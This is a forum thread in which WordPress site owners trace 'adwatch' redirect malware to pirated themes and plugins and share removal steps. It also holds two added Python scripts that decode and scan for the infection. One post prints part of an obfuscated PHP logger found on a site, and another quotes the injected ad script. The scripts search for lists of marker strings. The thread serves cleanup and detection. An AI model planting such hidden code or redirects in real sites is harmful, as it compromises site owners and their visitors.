Best Blackhat Forum

Full Version: Beware before downloading wordpress themes and plugins [adwatch]
I have the same problem with my website. Was not able to find any solution, but I found something weird.
A file called post.php with this in it:

0) print "\x53T\x41TUS\x2d\x49\x4dP\x4f\x52T-\x4fK"; if (strlen($input) > 10) { $fp = @fopen(str_replace("\x2ep\x68\x70",".\x62\x69\x6e",basename($_SERVER["SC\x52\x49P\x54_FIL\x45\x4eAM\x45"])), "a"); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER["\x52\x45\x4dOTE\x5f\x41DDR"]."\t".base64_encode($input)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } elseif (strpos($_SERVER["\x52\x45Q\x55\x45\x53T\x5f\x55R\x49"], "\x2es\x68\x74\x6dl") !== false) { print $_SERVER["\x52\x45Q\x55\x45\x53T\x5f\x55R\x49"]; } exit; ?>

Could it be related? I deleted the file multiple times and it keeps re-appearing.
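
To read a file like the one quoted above, decode its hex-escaped string literals first. The following is an added example, not code from the thread: it decodes the `\xHH` escapes in an excerpt of the posted fragment and lists the literals that hide plain ASCII. The function names are hypothetical.

```python
import re

# Excerpt of the post.php fragment quoted above (string literals copied as posted).
POSTED = (
    r'print "\x53T\x41TUS\x2d\x49\x4dP\x4f\x52T-\x4fK"; '
    r'$fp = @fopen(str_replace("\x2ep\x68\x70",".\x62\x69\x6e",'
    r'basename($_SERVER["SC\x52\x49P\x54_FIL\x45\x4eAM\x45"])), "a"); '
    r'@fputs($fp, $_SERVER["\x52\x45\x4dOTE\x5f\x41DDR"]."\t".base64_encode($input)."\r\n"); '
    r'strpos($_SERVER["\x52\x45Q\x55\x45\x53T\x5f\x55R\x49"], "\x2es\x68\x74\x6dl")'
)

DQ_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')   # PHP double-quoted string
HEX_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})')  # \xH or \xHH, as PHP reads it


def decode_hex(body):
    """Decode only \\xHH escapes; \\t, \\r, \\n and the rest stay as written."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), body)


def hidden_literals(php, min_escapes=2):
    """Return (raw, decoded) for literals that hex-escape printable ASCII.

    Ordinary code escapes bytes it cannot type; escaping plain letters only
    serves to defeat a text search, so such literals are worth a look.
    """
    found = []
    for match in DQ_LITERAL.finditer(php):
        raw = match.group(1)
        printable = [h for h in HEX_ESCAPE.findall(raw) if 0x20 <= int(h, 16) <= 0x7E]
        if len(printable) >= min_escapes:
            found.append((raw, decode_hex(raw)))
    return found


def deobfuscate(php):
    """Rewrite the source with every double-quoted literal decoded."""
    return DQ_LITERAL.sub(lambda m: '"' + decode_hex(m.group(1)) + '"', php)


if __name__ == "__main__":
    for raw, clear in hidden_literals(POSTED):
        print(f"{clear:<18} <- {raw}")
    print(deobfuscate(POSTED))
```

Decoded, the fragment appends the caller's address and the base64-encoded input to a `.bin` file named after the script, so a `post.bin` beside `post.php` is worth preserving before cleanup.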
(03-20-2014 02:23 PM) Wrote: [ -> ]I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from
and causing redirect at random time intervals from all my links on website.

open functions.php and remove this line: include 'inc/settings_class.php';

also remove the file at that location.

The jerk doing this uses an include function to the infected file. It's pretty easy to spot since it's at the very top of functions.php or, in the case of the mymail plugin, include 'classes/wc.class.php'; right at the top of mymail.php
(03-20-2014 03:19 PM)r1ckd33zy Wrote: [ -> ]
(03-20-2014 11:56 AM)adwatch Wrote: [ -> ]Hello to everyone at bestblackhatforum, my name is James and I am head of technical support over at

We have gone ahead and banned user: 234224

If these links are still causing you trouble please PM me your domain in question and I will add it to our domain block list.

Alternatively you can contact us here: 24 hours a day 7 days a week.

thank you and stay safe.
This is a most amazing act of 'customer support' I have seen in a while. Who would have thought that someone for would be involved in supporting members of a 'blackhat' forum...
Haha, we are a fairly new company and want to keep our name clean. We figure if we work with publishers, whether it be blackhat or whitehat, we can work together. Plus we have some really good fraud checks which none of our competitors have.

(03-20-2014 03:43 PM)imxa Wrote: [ -> ]
(03-20-2014 03:19 PM)r1ckd33zy Wrote: [ -> ]
(03-20-2014 11:56 AM)adwatch Wrote: [ -> ]Hello to everyone at bestblackhatforum, my name is James and I am head of technical support over at

We have gone ahead and banned user: 234224

If these links are still causing you trouble please PM me your domain in question and I will add it to our domain block list.

Alternatively you can contact us here: 24 hours a day 7 days a week.

thank you and stay safe.
This is a most amazing act of 'customer support' I have seen in a while. Who would have thought that someone for would be involved in supporting members of a 'blackhat' forum...

Is it safe to give the link of our sites? I mean, he could be a guy who collects sensitive data from our websites with this CR$%P script and needs our site link to take control of it. I'm paranoid, but this advertising company doesn't make me feel safe at all. I hope he is from a real technical support.
You don't need to PM your website if you're worried. You're welcome to contact us here:
(03-20-2014 06:08 PM)bale Wrote: [ -> ]
(03-20-2014 02:23 PM) Wrote: [ -> ]I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from
and causing redirect at random time intervals from all my links on website.

open functions.php and remove this line: include 'inc/settings_class.php';

also remove the file at that location.

The jerk doing this uses an include function to the infected file. It's pretty easy to spot since it's at the very top of functions.php or, in the case of the mymail plugin, include 'classes/wc.class.php'; right at the top of mymail.php
Where is this file ''functions.php'' located as I can't find it in my blog location?
Follow these steps

Log in to your wp-admin and then go to your site
click view source
now ctrl+f and search body {visibility:hidden;}
this code confirms adwatch is inserted in your theme or plugins.

this code is implemented before the </head> tag

if you access it in the same browser where you are logged in as admin you will find this source code on your home page
body {visibility:hidden;}</style>

now go to the exploit-scanner plugin then check that
Search for suspicious styles option
click start scan
after some time it will reload
now again ctrl+f and search body {visibility:hidden;}
and check which file is affected and then uninstall that theme or plugin or delete that code in that file
Yes this happened to me a few years ago. I downloaded a theme and installed it, then I began getting the message this site has been hacked. I removed the theme, deleted the sub-domain it was under. Then I checked each .js file and looked for the word "var" and sure enough I found a re-direct link.

Not every var text is bad just look for things like:
var adwatch
var iframe
var exclude
var adwatch_advert

and so on...
Good hunting.
Hi, I already tried searching for adwat in all the source files of WordPress and nothing was found. The strange thing is that this is still happening after I bought the theme and replaced all the files. I'm suspecting that the malware must be in the database or in some place other than the theme files.
But I can't find it anywhere.
(03-20-2014 06:08 PM)bale Wrote: [ -> ]
(03-20-2014 02:23 PM) Wrote: [ -> ]I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from
and causing redirect at random time intervals from all my links on website.

open functions.php and remove this line: include 'inc/settings_class.php';

also remove the file at that location.

The jerk doing this uses an include function to the infected file. It's pretty easy to spot since it's at the very top of functions.php or, in the case of the mymail plugin, include 'classes/wc.class.php'; right at the top of mymail.php
Go for this solution, it worked....
Thanks to adwatch, the ads are gone for now, but I can't find the script yet. The recommendations

"bale Wrote:
(Today 04:23 AM) Wrote:
I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from
and causing redirect at random time intervals from all my links on website.

open functions.php and remove this line: include 'inc/settings_class.php';

also remove the file at that location.

The jerk doing this uses an include function to the infected file. It's pretty easy to spot since it's at the very top of functions.php or, in the case of the mymail plugin, include 'classes/wc.class.php'; right at the top of mymail.php
Go for this solution, it worked....

Read more @ : Beware before downloading wordpress themes and plugins [adwatch] "

Didn't work for me because I don't have that string in my functions file, but thanks anyway
I'd like to thank everyone for sharing their contributions to this thread b/c I also ran across this problem w/ a plugin that I installed (EventON).
After spending countless hours going over every line of code with a colleague, it finally dawned on me to look @ the code that "bale" suggested was the problem.

My file was hidden away in "classes/class-settings.php" and called by include 'classes/class-settings.php'; in my eventon.php file.

The key is to do a search (I used the Multi-File Search in TextWrangler of my entire site --- downloaded locally to my machine) for the following string: spamcheckr

The "infected" file (class-settings.php) has a ton of commented out lines of code, but it really only does one thing which is to pull the URL "". Just bringing that URL up in your browser will show a blank page. But if you view the source, you will see the following code:

<script type="text/javascript">
    var adwatch_id = 234224;
    var adwatch_advert = "int";
    var exclude_domains = ['wp-admin', 'wp-login', '', '', '', '', '', '', ''];
</script>
<script type="text/javascript" src=""></script>

As "bale" suggested, just delete the include from your file and delete that class-settings.php and you should be good to go.
Hope this helps.
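
The checks described in this thread (a bare include near the top of functions.php or a plugin's main file, plus the marker strings posters searched for) combined into one scan over a local copy of the site. This is an added example, not code from any poster. The 40-line window, the file extensions and the sample tree are assumptions, and a bare include is a prompt to compare the file against the vendor's original package, not a verdict.

```python
import re, tempfile
from pathlib import Path

# Marker strings quoted by posters in this thread.
MARKERS = ("spamcheckr", "adwatch_id", "adwatch_advert", "body {visibility:hidden;}")
# Bare relative include/require, e.g.  include 'inc/settings_class.php';
BARE_INCLUDE = re.compile(
    r"""^\s*(?:include|require)(?:_once)?\s*\(?\s*['"]([^'"$]+\.php)['"]\s*\)?\s*;""")
HEAD_LINES = 40  # assumption: "top of the file" = first 40 lines

def read(path):
    return path.read_text(encoding="utf-8", errors="replace")

def has_marker(path):
    return path.is_file() and any(m in read(path) for m in MARKERS)

def scan(root):
    """Return sorted findings as (relative path, kind, detail, marker seen)."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix not in (".php", ".js", ".html"):
            continue
        rel = path.relative_to(root).as_posix()
        text = read(path)
        findings += [(rel, "marker", m, True) for m in MARKERS if m in text]
        if path.suffix != ".php":
            continue
        for line in text.splitlines()[:HEAD_LINES]:
            inc = BARE_INCLUDE.match(line)
            if inc:  # review: does the target belong to the original package?
                flagged = has_marker(path.parent / inc.group(1))
                findings.append((rel, "include", inc.group(1), flagged))
    return sorted(findings)

def demo():
    """Scan a constructed tree: one tampered theme, one clean plugin."""
    sample = {
        "themes/demo/functions.php": "<?php\ninclude 'inc/settings_class.php';\n",
        "themes/demo/inc/settings_class.php": "<?php\n// constructed: spamcheckr\n",
        "plugins/clean/clean.php": "<?php\nrequire_once __DIR__ . '/lib.php';\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in sample.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

As one poster notes, a clean result on the files does not rule out content injected elsewhere, such as the database.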